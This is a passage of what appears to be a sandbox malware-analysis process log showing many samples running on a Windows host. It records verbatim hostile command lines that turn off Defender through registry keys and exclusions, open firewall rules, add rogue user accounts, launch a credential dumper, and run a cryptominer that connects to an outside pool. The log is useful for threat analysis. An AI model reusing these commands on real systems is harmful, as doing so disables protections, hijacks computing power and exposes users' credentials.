      4⤵
      PID:5836
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:5412
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      PID:6120
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:6108
  - - C:\Windows\system32\write.exe
      write
      4⤵
      PID:6248
    - - C:\Program Files\Windows NT\Accessories\wordpad.exe
        
        "C:\Program Files\Windows NT\Accessories\wordpad.exe"
        5⤵
        
        PID:6616
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:7072
  - - C:\Windows\system32\write.exe
      write
      4⤵
      PID:3168
    - - C:\Program Files\Windows NT\Accessories\wordpad.exe
        
        "C:\Program Files\Windows NT\Accessories\wordpad.exe"
        5⤵
        
        PID:4656
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:7204
  - - C:\Windows\system32\write.exe
      write
      4⤵
      PID:5720
    - - C:\Program Files\Windows NT\Accessories\wordpad.exe
        
        "C:\Program Files\Windows NT\Accessories\wordpad.exe"
        5⤵
        
        PID:1168
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:7852
  - - C:\Windows\system32\control.exe
      control
      4⤵
      PID:6276
  - - C:\Windows\system32\net.exe
      net user DANIEL TROJAN /add
      4⤵
      PID:7440
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user DANIEL TROJAN /add
        5⤵
        
        PID:6952
  - - C:\Windows\system32\net.exe
      net user 4054 /add
      4⤵
      PID:1100
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 4054 /add
        5⤵
        
        PID:428
- C:\Users\Admin\AppData\Local\Temp\Files\route.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\route.exe"
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\hypersavesIntoRuntime\kwfdnN25sFO9XG48EjXTqioFlqF9.vbe"
    3⤵
    PID:352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\hypersavesIntoRuntime\xWSvEstqqDAQFrAa.bat" "
      4⤵
      PID:5416
    - - C:\hypersavesIntoRuntime\savesinto.exe
        
        "C:\hypersavesIntoRuntime\savesinto.exe"
        5⤵
        
        PID:5948
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        
        PID:4108
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        
        PID:2044
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        
        PID:5312
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        
        PID:2728
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        
        PID:5292
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        
        PID:5952
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        
        PID:2076
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/portBrowserWebFontwin/'
        6⤵
        
        PID:5524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        
        PID:5816
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
        6⤵
        
        PID:1896
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/hypersavesIntoRuntime/'
        6⤵
        
        PID:6124
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        
        PID:6092
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        
        PID:1800
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        
        PID:4832
      - C:\Windows\it-IT\wscript.exe
        
        "C:\Windows\it-IT\wscript.exe"
        6⤵
        
        PID:6176
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c8f9d8a9-4875-475d-98b1-691b432f278e.vbs"
        7⤵
        
        PID:7120
        
        C:\Windows\it-IT\wscript.exe
        
        C:\Windows\it-IT\wscript.exe
        8⤵
        
        PID:4160
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c963dd6f-5a58-462d-95df-8f0eafca22c1.vbs"
        7⤵
        
        PID:6500
- C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"
  2⤵
  PID:8092
- C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
  2⤵
  PID:5896

C:\Users\Admin\AppData\Local\Temp\is-8110T.tmp\tuc2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8110T.tmp\tuc2.tmp" /SL5="$202E4,4469003,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4368
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:536
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe --donate-level 1 -o de.zephyr.herominers.com:1123 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p workwork -a rx/0 -k --max-cpu-usage=50
    3⤵
    PID:2976

C:\Users\Admin\AppData\Local\Temp\is-06377.tmp\TNfnHRHCUJXtDWynapeSxFlf.tmp
"C:\Users\Admin\AppData\Local\Temp\is-06377.tmp\TNfnHRHCUJXtDWynapeSxFlf.tmp" /SL5="$2038A,4472587,54272,C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe"
1⤵
PID:4296
- C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe
  "C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe" -i
  2⤵
  PID:1784
- C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe
  "C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe" -s
  2⤵
  PID:1252
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\system32\net.exe" helpmsg 1102
  2⤵
  PID:2284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 1102
1⤵
PID:5064

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:4676

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:824

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:2340

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
PID:5084

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
1⤵
PID:316

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
1⤵
PID:3620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4016
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4344

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4856

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:436

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:2384

C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exe
C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exe pA /gDsite_idWIs 385118 /S
1⤵
PID:4608
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:4120
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2204
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CZfHRXFHxTaU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CZfHRXFHxTaU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqECRSyvRyPgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqECRSyvRyPgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XdSXIRHhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XdSXIRHhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nJAAWeDPVVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nJAAWeDPVVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZHPKbjSENnMKZrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZHPKbjSENnMKZrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kIqALRPQQwlbskwL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kIqALRPQQwlbskwL\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4700
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3172
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      UAC bypass
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:1516
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nJAAWeDPVVUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZHPKbjSENnMKZrVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn /t REG_DWORD /d 0 /reg:64
    3⤵
